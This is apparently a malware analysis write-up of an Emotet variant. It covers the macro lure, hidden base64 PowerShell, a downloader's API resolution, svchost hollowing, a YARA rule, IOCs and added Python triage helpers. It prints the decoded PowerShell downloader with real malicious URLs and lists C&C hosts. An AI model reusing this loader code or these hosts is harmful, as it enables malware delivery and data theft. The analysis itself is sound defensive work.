Preface
Emotet is one of the most prevalent banking Trojans today, with many variants and different obfuscators. It spreads mainly through spam: the macro document attached to the email acts as a downloader that fetches the Emotet payload and establishes persistence. This article analyses a variant sample obtained in January.
Sample running process
Sample analysis
Macro document analysis
Opening the document shows an image that lures the user into clicking the button that enables the macro.
In the VBA editor, the macros shown in the figure below are visible. All of the macro code is obfuscated, so the real logic cannot be read directly.
Debugging the macro dynamically, as the following two figures show, reveals that its function is to start WMI, which in turn executes a PowerShell script.
The PowerShell script runs a piece of base64-encoded code in a hidden window:
Powershell -w hidden -en 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
After decoding:
$Sonlfmxfglg='Xyysnkiuyxo';
$Eczadxvec='296';
$Zzrrzebyse='Vpybxxpmdeydq';
$Mwbgorhryfhne=$env:userprofile+'\'+$Eczadxvec+'.exe';
$Surzdxdygpth='Yfufnpswxz';
$Lvbojolxvxm=.('new-ob'+'j'+'ect')NEt.wEbclIeNT;
$Fvovadshhtbo='http://adykurniawan.com/mp3/18ox6h/*http://myphamthanhbinh.net/wp-content/uploads/qDq/*http://sfmac.biz/calendar/K1a/*http://www.mjmechanical.com/wp-includ
According to the decoded code above, the PowerShell script iterates over the four malicious URLs, downloads the corresponding malicious program and saves it as 296.exe.
Process tree generated after Word starts the macro:
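For triage it is useful to decode such a launcher command line automatically rather than by hand. The following Python is an added example, not code from the post or from the sample: it decodes the `-en` argument (PowerShell's `-EncodedCommand` is base64 over UTF-16LE text), folds the `'new-ob'+'j'+'ect'` string-splitting trick back into one literal, and extracts the URL list, the hostnames and the drop file name. The script it decodes is a constructed stand-in with the same shape as the decoded payload above; the `.example` domains and `$VarN` names are placeholders, not indicators.

```python
"""Decode a 'powershell -w hidden -en <base64>' launcher and pull out IOCs.

Added example for the analysis above; not code from the post or the sample.
SAMPLE_SCRIPT is a constructed stand-in mirroring the decoded payload's shape.
"""
import base64
import re
from urllib.parse import urlparse

# Constructed stand-in for the decoded script (placeholder domains and names).
SAMPLE_SCRIPT = (
    "$Var1='Junk';"
    "$Var2='296';"
    "$Var3=$env:userprofile+'\\'+$Var2+'.exe';"
    "$Var4=.('new-ob'+'j'+'ect') NEt.wEbclIeNT;"
    "$Var5='http://host-a.example/mp3/18ox6h/*"
    "http://host-b.example/wp-content/uploads/qDq/*"
    "http://host-c.example/calendar/K1a/*"
    "http://www.host-d.example/wp-includes/x/';"
)
# -EncodedCommand is base64 over UTF-16LE text, so the stand-in is encoded the same way.
SAMPLE_CMDLINE = "Powershell -w hidden -en " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the plaintext script from a command line carrying -e/-en/-enc/-EncodedCommand."""
    m = re.search(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def collapse_concatenation(script):
    """Fold adjacent single-quoted literals joined by '+' into one literal, e.g. 'new-ob'+'j'+'ect'."""
    pattern = re.compile(r"'([^']*)'\+'([^']*)'")
    while True:
        folded = pattern.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        if folded == script:
            return folded
        script = folded


def extract_indicators(script):
    """Recover the URL list, hostnames and drop file name from the decoded script."""
    script = collapse_concatenation(script)
    # Every plain string assignment: $Name='value'
    literals = dict(re.findall(r"\$(\w+)='([^']*)'", script))
    # The download list is one literal with '*' separators.
    urls = []
    for value in literals.values():
        if value.lower().startswith("http"):
            urls = [u for u in value.split("*") if u]
    # $env:userprofile+'\'+$Var+'.exe' names the variable that holds the file stem.
    drop = None
    m = re.search(r"\$env:userprofile\+'\\'\+\$(\w+)\+'\.exe'", script)
    if m and m.group(1) in literals:
        drop = literals[m.group(1)] + ".exe"
    return {
        "urls": urls,
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "drop_file": drop,
        "webclient": "new-object" in script.lower(),
    }


if __name__ == "__main__":
    decoded = decode_encoded_command(SAMPLE_CMDLINE)
    for key, value in extract_indicators(decoded).items():
        print(f"{key}: {value}")
```

The hostnames returned are what belongs in an IOC list like the one at the end of this post; the `webclient` flag records that the script instantiates `Net.WebClient`, which is the download primitive worth alerting on in PowerShell script-block logs.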
Malicious downloader analysis
The sample first obtains the addresses of the functions it needs.
It gets the load base address of the DLL through the PEB.
It then obtains the function addresses through the export table; in between is a long series of obfuscating SendMessageA calls.
Next it reads the data in the resource section.
The data obtained from the resource is stored in two allocated blocks of memory and XOR-decrypted to produce the shellcode.
The main function of the shellcode in the first block of memory is to obtain the addresses of the CryptoAPI functions. The second block obtains the addresses of several API functions by hash, then allocates a third block of memory and fills it with data. The program's logic lives in this third block.
A function near the top of the third block stores the results of the hash calculations held in an array to their corresponding memory addresses.
The following is the start of the actual program.
It compares the command-line parameters; if the comparison fails, it starts a new process with command-line parameters and then exits the current process.
It then checks whether the current process path is in the system directory; if it is, it returns eax.
If not, it drops the current file into the system directory, creates a service, starts the process and returns 0.
It resolves the remote server through the hash calculation and downloads the file.
It writes the file and creates a process.
From the analysis so far, this sample is actually a downloader; what follows is the real information-stealing program.
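The export-table walk described above (base address, e_lfanew at 0x3C, export data directory at NT header + 0x78, NumberOfNames at +0x18, AddressOfFunctions at +0x1C) is what the disassembly in the YARA rule later in this post encodes, and the same walk is what the second shellcode block performs when it resolves APIs by hash. The Python below is an added example, not code from the sample or the post: it constructs a minimal PE32 image in memory and resolves exports by name and by hash following exactly those offsets, which are the documented PE32 layout. The ROR-13 hash is only a stand-in for illustration; the post does not state which hash this sample uses.

```python
"""Resolve exports by walking the PE headers the way the obfuscated stub does.

Added example, not code from the sample or the post. Offsets are the documented
PE32 layout (IMAGE_DOS_HEADER / IMAGE_NT_HEADERS / IMAGE_EXPORT_DIRECTORY).
The image is constructed so the script runs offline; ROR-13 is a stand-in hash.
"""
import struct


def build_fake_image():
    """Construct a minimal mapped PE32 image with three named exports."""
    img = bytearray(0x1000)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)                 # e_lfanew -> NT headers at 0x80
    img[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", img, 0x84, 0x014C)               # Machine = IMAGE_FILE_MACHINE_I386
    struct.pack_into("<H", img, 0x98, 0x010B)               # OptionalHeader.Magic = PE32
    export_dir = 0x200
    struct.pack_into("<II", img, 0x80 + 0x78, export_dir, 0x100)  # DataDirectory[EXPORT]
    # Names deliberately not in function-table order so the ordinal indirection is exercised.
    func_rvas = [0x400, 0x410, 0x420]                       # LoadLibraryA, GetProcAddress, VirtualAlloc
    names = [(b"GetProcAddress", 1), (b"LoadLibraryA", 0), (b"VirtualAlloc", 2)]
    struct.pack_into("<I", img, export_dir + 0x14, len(func_rvas))  # NumberOfFunctions
    struct.pack_into("<I", img, export_dir + 0x18, len(names))      # NumberOfNames
    struct.pack_into("<I", img, export_dir + 0x1C, 0x300)           # AddressOfFunctions
    struct.pack_into("<I", img, export_dir + 0x20, 0x320)           # AddressOfNames
    struct.pack_into("<I", img, export_dir + 0x24, 0x330)           # AddressOfNameOrdinals
    for i, rva in enumerate(func_rvas):
        struct.pack_into("<I", img, 0x300 + 4 * i, rva)
    str_rva = 0x340
    for i, (name, index) in enumerate(names):
        struct.pack_into("<I", img, 0x320 + 4 * i, str_rva)
        struct.pack_into("<H", img, 0x330 + 2 * i, index)
        img[str_rva:str_rva + len(name)] = name             # buffer is zeroed, so a NUL follows
        str_rva += len(name) + 1
    return bytes(img)


def u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def u16(buf, off):
    return struct.unpack_from("<H", buf, off)[0]


def c_string(buf, off):
    return buf[off:buf.index(b"\0", off)].decode("ascii")


def ror13_hash(name):
    """Stand-in API-name hash (rotate-right-13, add byte); not confirmed for this sample."""
    h = 0
    for ch in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + ch) & 0xFFFFFFFF
    return h


def exports(img):
    """Yield (name, rva) for every named export, following the stub's own offsets."""
    e_lfanew = u32(img, 0x3C)                   # mov eax, [ebp+3Ch]
    export_rva = u32(img, e_lfanew + 0x78)      # mov edi, [eax+ebp+78h]
    n_names = u32(img, export_rva + 0x18)       # mov ecx, [edi+ebp+18h]
    funcs = u32(img, export_rva + 0x1C)         # mov ebx, [edi+ebp+1Ch]
    names = u32(img, export_rva + 0x20)         # AddressOfNames
    ordinals = u32(img, export_rva + 0x24)      # AddressOfNameOrdinals
    for i in range(n_names):
        name = c_string(img, u32(img, names + 4 * i))
        index = u16(img, ordinals + 2 * i)      # unbiased index into AddressOfFunctions
        yield name, u32(img, funcs + 4 * index)


def resolve_by_name(img, wanted):
    """Plain export lookup, as GetProcAddress would do it."""
    for name, rva in exports(img):
        if name == wanted:
            return rva
    return None


def resolve_by_hash(img, wanted_hash, hash_fn=ror13_hash):
    """Hash-based lookup: the caller embeds only the hash, never the API name string."""
    for name, rva in exports(img):
        if hash_fn(name) == wanted_hash:
            return rva
    return None


if __name__ == "__main__":
    image = build_fake_image()
    for name, rva in exports(image):
        print(f"{name:16s} rva=0x{rva:x} ror13=0x{ror13_hash(name):08x}")
```

For an analyst the practical use is the reverse direction: dump the export names of the DLLs a sample loads, hash each with the candidate algorithm, and match the constants found in the shellcode's array to recover which APIs it actually calls.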
Analysis of the stealing program
From its behaviour, after the malicious program runs it creates a system program through thread injection or the puppet-process technique, and uses that system process to collect local data and send it to the remote server.
Looking at the file's resource information, the code format is very similar to the downloader's, so it can be judged that the same obfuscator was used.
Because the malicious program uses the same obfuscator, the early code execution flow is identical: it allocates memory to execute the shellcode, then decrypts the key logic code into the third memory block.
Subsequent data is encrypted and decrypted with a continuous XOR.
It creates an svchost puppet process.
It allocates memory, writes code into it, and hooks the program's entry point.
After the entry point executes ret, execution continues at memory address 0x6100, which is memory in the svchost process written by the malicious program.
It copies the malicious process to the system directory.
Collects local information
Data input
Sends data
The subsequent malicious program has other behaviours, which I will not analyse one by one here.
YARA rule
Since the malicious sample uses an obfuscator, I generally like to add its binary code to the YARA rule. Below, I took the assembly of the function-resolution routines generated by the obfuscator and used it as the signature of the malicious program.
(Of course, in practice many packers also obtain exported functions this way; if only this one feature is used, it may cause false positives. You can add other features according to your needs.)
rule VirTool_Obfuscator_a
{
    meta:
        author = "0x17"
        samples = "d27590b402b475ae11a93f2976c2de595ab1eac9"
        samples = "3d40a6516172d4115be08dd03767526f4b24dce8"
    strings:
        /*
        8B 6C 24 ??          mov  ebp, [esp+10h+arg_0]
        8B 45 3C             mov  eax, [ebp+3Ch]
        56                   push esi
        8B 35 ?? ?? ?? ??    mov  esi, ds:SendMessageA
        57                   push edi
        8B 7C 28 78          mov  edi, [eax+ebp+78h]
        8B 5C 2F 1C          mov  ebx, [edi+ebp+1Ch]
        8B 4C 2F 18          mov  ecx, [edi+ebp+18h]
        6A 00                push 0          ; lParam
        03 FD                add  edi, ebp
        6A 02                push 2          ; wParam
        6A 06                push 6          ; Msg
        03 DD                add  ebx, ebp
        6A 00                push 0          ; hWnd
        89 4C 24 ??          mov  [esp+28h+arg_0], ecx
        89 5C 24 ??          mov  [esp+28h+var_8], ebx
        FF D6                call esi        ; SendMessageA
        */
        $hex_string1 = { 8B 6C 24 ?? 8B 45 3C 56 8B 35 ?? ?? ?? ?? 57 8B 7C 28 78 8B 5C 2F 1C 8B 4C 2F 18 6A 00 03 FD 6A 02 6A 06 03 DD 6A 00 89 4C 24 ?? 89 5C 24 ?? FF D6 }
        /*
        03 48 3C             add  ecx, [eax+3Ch]
        89 4D ??             mov  [ebp+var_10], ecx
        8B 55 ??             mov  edx, [ebp+var_10]
        8B 45 ??             mov  eax, [ebp+arg_0]
        03 42 78             add  eax, [edx+78h]
        89 45 ??             mov  [ebp+var_8], eax
        8B 4D ??             mov  ecx, [ebp+var_8]
        8B 51 18             mov  edx, [ecx+18h]
        89 55 ??             mov  [ebp+var_4], edx
        8B 45 ??             mov  eax, [ebp+var_8]
        8B 4D ??             mov  ecx, [ebp+arg_0]
        03 48 1C             add  ecx, [eax+1Ch]
        89 4D ??             mov  [ebp+var_1C], ecx
        */
        $hex_string2 = { 03 48 3C 89 4D ?? 8B 55 ?? 8B 45 ?? 03 42 78 89 45 ?? 8B 4D ?? 8B 51 18 89 55 ?? 8B 45 ?? 8B 4D ?? 03 48 1C 89 4D ?? }
    condition:
        1 of them
}
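To see what the `??` wildcards in the two hex strings actually tolerate, and why the rule's `1 of them` condition fires on either routine, the following Python is an added example (not part of the post) that translates the rule's hex strings into byte regexes and scans a buffer the way YARA would. The scanned buffer is constructed from the pattern itself with the wildcard bytes filled in, so it runs offline without the samples.

```python
"""Apply the rule's hex strings to a byte buffer the way YARA's '??' wildcard does.

Added example, not part of the post. The two patterns are copied from the rule
above; the buffer scanned is constructed here so the script runs offline.
"""
import re

HEX_STRING1 = ("8B 6C 24 ?? 8B 45 3C 56 8B 35 ?? ?? ?? ?? 57 8B 7C 28 78 8B 5C 2F 1C "
               "8B 4C 2F 18 6A 00 03 FD 6A 02 6A 06 03 DD 6A 00 89 4C 24 ?? 89 5C 24 ?? FF D6")
HEX_STRING2 = ("03 48 3C 89 4D ?? 8B 55 ?? 8B 45 ?? 03 42 78 89 45 ?? 8B 4D ?? "
               "8B 51 18 89 55 ?? 8B 45 ?? 8B 4D ?? 03 48 1C 89 4D ??")
PATTERNS = {"$hex_string1": HEX_STRING1, "$hex_string2": HEX_STRING2}


def hex_pattern_to_regex(hex_string):
    """Translate a YARA hex string (fixed bytes and ?? wildcards) into a compiled bytes regex."""
    parts = []
    for tok in hex_string.split():
        if tok == "??":
            parts.append(b".")                       # any single byte
        else:
            parts.append(re.escape(bytes([int(tok, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)    # DOTALL so '.' also matches 0x0A


def instantiate(hex_string, fill):
    """Build concrete bytes from a pattern, filling every ?? with `fill` (used to build test input)."""
    return bytes(fill if tok == "??" else int(tok, 16) for tok in hex_string.split())


def scan(buf, patterns):
    """Return {name: [offsets]} for each pattern that matches at least once."""
    hits = {}
    for name, hex_string in patterns.items():
        offsets = [m.start() for m in hex_pattern_to_regex(hex_string).finditer(buf)]
        if offsets:
            hits[name] = offsets
    return hits


def rule_matches(buf):
    """Equivalent of the rule's condition '1 of them'."""
    return bool(scan(buf, PATTERNS))


if __name__ == "__main__":
    # Constructed test input: padding, the first routine with wildcard bytes set to 0x10, padding.
    sample = b"\x90" * 16 + instantiate(HEX_STRING1, 0x10) + b"\xcc" * 8
    print(scan(sample, PATTERNS), rule_matches(sample))
```

Note how little the wildcards give back: `$hex_string1` still pins the exact register allocation (ebp as module base, esi for SendMessageA, edi/ebx/ecx for the export directory fields), so a recompiled stub with different registers would escape it. That is the trade-off behind the false-positive caveat above: the same structural walk appears in legitimate packers, so the rule relies on this exact encoding rather than on the behaviour.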
Two hits reported by the YARA engine:
IOC
Macro document
SHA1: be9efb37ebba29888e1e6451cc6294bde8c30d04
Malicious downloader
SHA1: d27590b402b475ae11a93f2976c2de595ab1eac9
Stealing program
SHA1: 3d40a6516172d4115be08dd03767526f4b24dce8
C&C
adykurniawan.com
myphamthanhbinh.net
mjmechanical.com
100.6.23.40
…